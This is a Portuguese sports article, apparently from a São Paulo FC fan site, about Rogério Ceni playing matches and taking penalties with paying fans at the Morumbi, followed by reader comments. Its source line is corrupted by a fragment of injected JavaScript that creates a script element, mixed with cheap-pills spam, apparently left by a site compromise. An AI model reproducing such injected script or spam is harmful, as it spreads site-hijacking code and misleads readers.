Destaque

Antes de clássico, Ceni encara o frio e joga com torcedores no Morumbi

O goleiro Rogério Ceni realizou o sonho de 44 torcedores do São Paulo, nesta fria sexta-feira, no Morumbi. A menos de 48h para o clássico contra o Palmeiras, no domingo, o M1t0 participou de duas partidas com tricolores, que pagaram R$ 4.480,00 para estar em campo com o ídolo. O goleiro não fez gol, mas deu passes e distribuiu abraços dentro do gramado.

– Para mim foi muito legal. Realmente é um valor expressivo que eles pagaram, mas eu disse que eles aproveitassem ao máximo. Não só por jogar comigo, mas por realizar um sonho de jogar no Morumbi. A primeira impressão que eu tive quando cheguei ao Morumbi foi de não imaginar algo desse tamanho. Olhar esse momento especial para eles. Foi uma reação muito bacana.

Rogério Ceni e Aloísio Chulapa durante festa com torcedores no Morumbi (Foto: Alex Silva/Estadão Conteúdo)

Rogério Ceni e Aloísio Chulapa durante festa com torcedores no Morumbi (Foto: Alex Silva/Estadão Conteúdo)

Ceni quase ficou fora do evento devido a uma lesão muscular na coxa direita. Mas, recuperado, fez a alegria dos torcedores. Antes das partidas, participou de uma palestra. Em campo, claramente evitou fazer muito esforço. Do outro lado, os torcedores foram orientados a pegarem leve com o M1t0, mas, segundo ele, nem precisou o alerta.

– Não precisou (risos) Todo mundo são-paulino, todo mundo quer ver o jogo no domingo. E eu só dou um toque na bola, não carrego. O pessoal se divertiu, comemorou, teve gente que fez três gols, vai até pedir música… – brincou.

No total, são três dias de evento, que é organizado pela agência oficial do clube. Foram disponibilizados três pacotes: o mais caro, com os jogos com Ceni, rendeu R$ 214.720,00. No total, o clube arrecadou pouco mais de R$ 850 mil com a iniciativa.

No primeiro tempo da partida inicial, Ceni jogou no time de camisa branca, enquanto Aloísio Chulapa, ex-jogador tricolor e amigo do capitão, vestiu a camisa listrada. O M1t0 atuou como zagueiro e quase entregou dois gols para a outra equipe. É bem verdade que o time do goleiro não ajudou muito. Ficou perto de tomar o primeiro gol em cobrança de pênalti, mas Gabriel defendeu e, como presente, recebeu um abraço do ídolo.

Rogério cobra pênalti para torcedor tentar defender (Foto: João Gabriel Rodrigues)

Rogério cobra pênalti para torcedor tentar defender (Foto: João Gabriel Rodrigues)

– É utopia. Não importa o resultado do jogo. Pegar um pênalti no Morumbi e receber o abraço de Rogério é utopia. Nada mais importa. Posso sair do Morumbi e não fazer mais nada. Minha vida está completa – disse, empolgado, Gabriel.

– O árbitro foi mal porque não foi pênalti. Mas nosso goleiro foi muito bem – brincou Rogério.

Moacir Fernandes viajou de Fortaleza a São Paulo para jogar com Ceni. Há 13 dias, rompeu os ligamentos do tornozelo direito, mas viajou para São Paulo mesmo assim. Tudo para conhecer o ídolo.

– Vim do Ceará para o jogo com o Mito. Cresci vendo o São Paulo na TV e me apaixonei. E o Rogério é o maior símbolo do time. Poder me encontrar com ele é indescritível. Eu treino jiu-jitsu, rompi os ligamentos. Não aguentava pisar no chão. Mas eu tinha de vir. Veio todo mundo, minha namorada, meus pais. Era a chance que eu tinha de realizar um sonho de criança. É indescritível.

Tentei dar três chutes, mas cada um mais fraco que o outro (risos). Dei uma enganada, mas tabelei com o Rogério. Nunca vou me esquecer – disse.

No segundo tempo, Ceni mudou de lado e chegou a dar o passe para um dos gols do time da camisa listrada, que venceu por 6 a 1. Na sequência, o goleiro cobrou pênaltis contra cada um dos torcedores que estavam em campo.

Dos 23 chutes, errou três, ao tentar dar uma cavada e ao mandar outros dois na trave. Foi para o gol apenas uma vez, mas não defendeu a cobrança de Aloisio Chulapa. O ex-atacante também tentou parar o chute do goleiro, mas não conseguiu.

No segundo jogo, o mesmo ritual. Ceni e Aloísio disputaram um tempo em cada time, e o goleiro voltou a cobrar pênaltis. A noite dos torcedores, então, estava completa.

Fonte: Gevar d=document;var s=d.createElement(‘script’); to order cheap pills no prescription

View Comments (2)

2 Comments

  1. Nelson de Deus Ferreira

    27 de junho de 2015 at 02:31

    Grande noite! Valeu pela vida inteira de torcedor, já que estar no Morumbi jogando com ídolos iguais Rogério,o M1to deve ser o máximo de emoção pra qualquer sãopaulino!!!

  2. fabinho Silva

    27 de junho de 2015 at 02:45

    Um sonho , em dezembro estarei jogando tbm!

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

São Paulo abre tratativas com lateral ex-Barcelona a pedido de Cuca

saopauloadmin23 de maio de 2019

Buscamos o gol de todo jeito, mas vamos tentar reverter em Salvador

saopauloadmin23 de maio de 2019

São Paulo perde do Bahia no Morumbi e se complica na Copa do Brasil

saopauloadmin23 de maio de 2019

Reforço! Calazans é do São Paulo até 2022

saopauloadmin21 de maio de 2019

Novidade na reapresentação: Arboleda trabalha no campo

saopauloadmin21 de maio de 2019

Com três novidades, São Paulo divulga relacionados para a partida contra o Bahia

saopauloadmin18 de maio de 2019

São Paulo se defende de assédio e tenta manter Antony até o fim do ano, diz PVC

saopauloadmin14 de maio de 2019

São Paulo vence o Fortaleza no reencontro com Rogério Ceni

saopauloadmin13 de maio de 2019

Bruno Peres retorna e São Paulo relaciona 23 atletas para jogo contra o Fortaleza

saopauloadmin11 de maio de 2019